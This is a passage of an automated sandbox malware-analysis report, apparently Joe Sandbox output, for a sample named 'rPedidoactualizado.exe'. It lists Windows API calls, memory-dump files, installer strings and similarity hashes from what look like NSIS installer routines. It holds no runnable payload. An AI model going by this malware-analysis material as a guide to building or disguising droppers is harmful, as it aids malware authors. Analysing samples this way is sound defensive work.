                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-4032566419
                                          • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                          • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                          • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                          • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                          • GetSysColor.USER32(00000000), ref: 004042D0
                                          • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                          • SetBkMode.GDI32(?,?), ref: 004042E8
                                          • GetSysColor.USER32(?), ref: 004042FB
                                          • SetBkColor.GDI32(?,?), ref: 0040430B
                                          • DeleteObject.GDI32(?), ref: 00404325
                                          • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                          • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                          • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                          APIs
                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                            • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                          • String ID: 9
                                          • API String ID: 163830602-2366072709
                                          • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                          • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                          • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                          • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                          • GetMessagePos.USER32 ref: 00404BEC
                                          • ScreenToClient.USER32(?,?), ref: 00404C06
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                          • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                          • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                          • MulDiv.KERNEL32(000A8699,00000064,000A9040), ref: 00402E3C
                                          • wsprintfW.USER32 ref: 00402E4C
                                          • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                          Strings
                                          • verifying installer: %d%%, xrefs: 00402E46
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                          • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                          • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                          • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                          • GlobalFree.KERNEL32(?), ref: 00402956
                                          • GlobalFree.KERNEL32(00000000), ref: 00402969
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                          • String ID:
                                          • API String ID: 2667972263-0
                                          • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                          • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                          • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                          • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                          APIs
                                          • GetDC.USER32(?), ref: 00401DBC
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                          • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                          • String ID:
                                          • API String ID: 3808545654-0
                                          • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                          • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                          • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                          • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                          • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                          • Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                          • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                          • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                          • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                          • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                          APIs
                                          • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                          • wsprintfW.USER32 ref: 00404B65
                                          • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                          • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                          • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                          • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000400,?,?,00000021), ref: 004025E8
                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000400,?,?,00000021), ref: 004025F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
